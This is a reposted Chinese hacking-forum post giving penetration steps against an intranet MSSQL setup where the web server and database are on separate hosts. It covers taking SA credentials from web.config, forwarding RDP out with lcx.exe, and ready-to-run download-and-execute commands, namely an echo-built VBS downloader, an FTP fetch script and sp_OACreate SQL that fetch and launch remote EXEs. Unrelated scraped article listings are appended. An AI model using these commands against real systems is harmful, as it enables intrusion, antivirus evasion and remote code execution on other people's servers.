本文转自:http://bbs.blackbap.org/thread-6203-1-2.html

1. 服务器属内网环境,站库分离,通过web.config找到数据库服务库SA帐号密码,成功添加用户(192.168.0.206) 。
2.
Web服务器(192.168.0.203) 、数据库服务器(192.168.0.206)都存在symantec杀毒软件,不能转lcx.exe工具转发

3. 测试过其它的转发工具,要么被查杀,要么无法用,使用reDuh工具只能转发当前IP的,而且速度极慢,受不了0.0 。
4.
使用msfpayload生成的exe文件也被查杀,由于服务器是x64的,msfencode没有x64的编码器,所以没能反弹成功

思路1:关闭杀软,通过以下提供的命令下载文件(未测试)
思路2:使用msf
aspx反弹,然后进行转发及跨路由渗透(已成功)

正常思路:如果没有杀软,直接传lcx.exe到192.168.0.203上,然后使用以下命令转发192.168.0.206:
c:\lcx.exe
-slave 你的外网IP 51 192.168.0.206 3389                // 看了这个后,你们应该都懂的吧 0.0

DOS命令:(一条一条执行)

  1. echo Set Post = CreateObject("Msxml2.XMLHTTP") >>xxx.vbs
  2. echo Set Shell = CreateObject("Wscript.Shell") >>xxx.vbs
  3. echo Post.Open "GET","http://bbs.blackbap.org/payload.exe",0
    >>xxx.vbs
  4. echo Post.Send() >>xxx.vbs
  5. echo Set aGet = CreateObject("ADODB.Stream") >>xxxc.vbs
  6. echo aGet.Mode = 3 >>xxx.vbs
  7. echo aGet.Type = 1 >>xxx.vbs
  8. echo aGet.Open() >>xxx.vbs
  9. echo aGet.Write(Post.responseBody) >>xxx.vbs
  10. echo aGet.SaveToFile "c:\xxxc.exe",2 >>xxx.vbs
  11. echo wscript.sleep 1000 >>xxxc.vbs
  12. echo Shell.Run ("c:\xxx.exe") >>xxx.vbs

复制代码

  1. echo open 127.0.0.1>c:\ftp.dat
  2. echo admin>>c:\ftp.dat
  3. echo admin>>c:\ftp.dat
  4. echo binary>>c:\ftp.dat
  5. echo get lcx.exe>>c:\ftp.dat
  6. echo bye>>c:\ftp.dat
  7. ftp -s:c:\ftp.dat

复制代码

MSSQL 命令:

  1. DECLARE @js int
  2. EXEC sp_OACreate 'ScriptControl',@js OUT
  3. EXEC sp_OASetProperty @js, 'Language', 'JavaScript1.1'
  4. EXEC sp_OAMethod @js, 'Eval', NULL, 'var x = new
    ActiveXObject("Microsoft.XMLHTTP");x.Open("GET", "Url",0);x.Send();var s = new
    ActiveXObject("ADODB.Stream");s.Mode = 3;s.Type =
    1;s.Open();s.Write(x.responseBody);s.SaveToFile("C:\\windows\\自己设置保存的EXE文件名.exe",2);var
    r = new
    ActiveXObject("WScript.Shell");r.Run("C:\\windows\\自己设置保存的EXE文件名.exe");'

复制代码

  1. declare @o int, @f int, @t int, @ret int
  2. exec sp_oacreate 'scripting.filesystemobject', @o out
  3. exec sp_oamethod @o, 'createtextfile', @f out, 'C:\1.bat', 1
  4. exec @ret = sp_oamethod @f, 'writeline', NULL,'open IP'
  5. exec @ret = sp_oamethod @f, 'writeline', NULL,'ftp账号'
  6. exec @ret = sp_oamethod @f, 'writeline', NULL,'ftp密码'
  7. exec @ret = sp_oamethod @f, 'writeline', NULL,'get lcx.exe'
  8. exec @ret = sp_oamethod @f, 'writeline', NULL,'bye'

MSSQL站库分离情况的渗透思路的更多相关文章

  1. 小迪安全 Web安全 基础入门 - 第五天 - 资产架构&端口&应用&CDN&WAF&站库分离&负载均衡

    一.资产架构 1.Web单个源码指向安全,域名指向一个网站,网站对应一个程序.对应一个目录. 2.Web多个目录源码安全,搭建完一个网站后,在网站目录下搭建新的站点. 3.Web多个端口源码安全,与多 ...

  2. Android实训案例(九)——答题系统的思绪,自己设计一个题库的体验,一个思路清晰的答题软件制作过程

    Android实训案例(九)--答题系统的思绪,自己设计一个题库的体验,一个思路清晰的答题软件制作过程 项目也是偷师的,决心研究一下数据库.所以写的还是很详细的,各位看官,耐着性子看完,实现结果不重要 ...

  3. Oracle主库归档丢失,备库日志有gap,在不重建备库的情况下,恢复备库

    本文主要描述Oracle备库日志与主库日志之间有gap,切主库这部分gap的归档日志已经删除或丢失,如何在不重建备库的情况下,恢复备库. 欢迎转载,请注明作者.出处. 作者:张正 blog:http: ...

  4. vue项目实践-前后端分离关于权限的思路

    前后端分离后权限的思路 最近看到许多关于权限的思路,但好像都是使用动态加载路由的方式,现在也分享下我在项目中使用的解决方案. 前后端分离关于权限的处理每个人都不一样,根据项目选择制定合适的方案就好 我 ...

  5. Spring + iBatis 的多库横向切分简易解决思路

    国内私募机构九鼎控股打造APP,来就送 20元现金领取地址:http://jdb.jiudingcapital.com/phone.html内部邀请码:C8E245J (不写邀请码,没有现金送)国内私 ...

  6. SpringBoot 配置文件与依赖库分离打包配置

    一.应用场景 一般情况下我们对springboot应用打包时使用springboot的maven插件spring-boot-maven-plugin的maven进行打包,打包完成得到一个fatjar, ...

  7. phpmyadmin系列渗透思路连载(一)

    当拿到phpmyadin的站点后,我一般会尝试一下几种攻击手法: 1.通过弱口令进入后台,尝试into outfile写入一句话 条件:(1)有写的权限    (2)知道web绝对路径    (3)w ...

  8. 开源图编辑库 NebulaGraph VEditor 的设计思路分享

    本文首发于 NebulaGraph 公众号 NebulaGraph VEditor 是一个拥有高性能.高可定制的所见即所得图可视化编辑器前端库. NebulaGraph VEditor 底层基于 SV ...

  9. MSSQL订阅库索引对齐

    需求如下图: 在原来的架构中是每台web服务器都固定访问某一台数据库服务器,所以就造成了每台数据库订阅服务器上的索引不一致.现在的需求就是要把所有的订阅库上的索引调整为一致,为了就是实现高可用+负载均 ...

随机推荐

  1. 汕头市队赛 SRM 07 C 整洁的麻将桌

    C 整洁的麻将桌 SRM 07 背景&&描述 天才麻将少女KPM立志要在日麻界闯出一番名堂.     KPM上周双打了n场麻将,但她这次没控分,而且因为是全民参与的麻将大赛,所以她的名 ...

  2. 一种提高Android应用进程存活率新方法

    一.基础知识 1.Android 进程优先级 1.1 进程优先级等级一般分法:- Activte process- Visible Process- Service process- Backgrou ...

  3. Charles安装

    Charles 是一个网络抓包工具,在做 APP 抓包的时候会用到,相比 Fiddler 来说,Charles 的功能更为强大,而且跨平台支持更好,所以在这里我们选用 Charles 来作为主要的移动 ...

  4. (1)php开篇常识

    一.php PHP由zend公司开发维护,目前最高版本PHP7.1,官网地址http://php.net/ PHP从5.5开始不支持XP,没有PHP6这个版本 PHP是嵌入到HTML的脚本代码,格式: ...

  5. 链式前向星BFS

    本文链接:http://i.cnblogs.com/EditPosts.aspx?postid=5399068 采用链式前向星的BFS: #include <iostream> #incl ...

  6. Python的程序结构[1] -> 方法/Method[3] -> 魔术方法 __getattr__ 与代理模式

    __getattr__ 方法 __getattr__ 方法当对象调用内部属性(包括方法等)且未找到对应属性的时候会调用的特殊方法.利用这一特性,可是对函数实现一个代理模式. __getattr__方法 ...

  7. HDU6383 2018 “百度之星”程序设计大赛 - 初赛(B) 1004-p1m2 (二分)

    原题地址 p1m2 Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 131072/131072 K (Java/Others)Total ...

  8. POJ 2763 Housewife Wind(树链剖分)(线段树单点修改)

    Housewife Wind Time Limit: 4000MS   Memory Limit: 65536K Total Submissions: 10378   Accepted: 2886 D ...

  9. 【bzoj4403】【序列统计】不降转升+组合数添项合并

    (上不了p站我要死了,侵权度娘背锅) Description 给定三个正整数N.L和R,统计长度在1到N之间,元素大小都在L到R之间的单调不降序列的数量.输出答案对10^6+3取模的结果. Input ...

  10. rest ---hateoas

    推荐一篇博客. https://www.ibm.com/developerworks/cn/java/j-lo-SpringHATEOAS/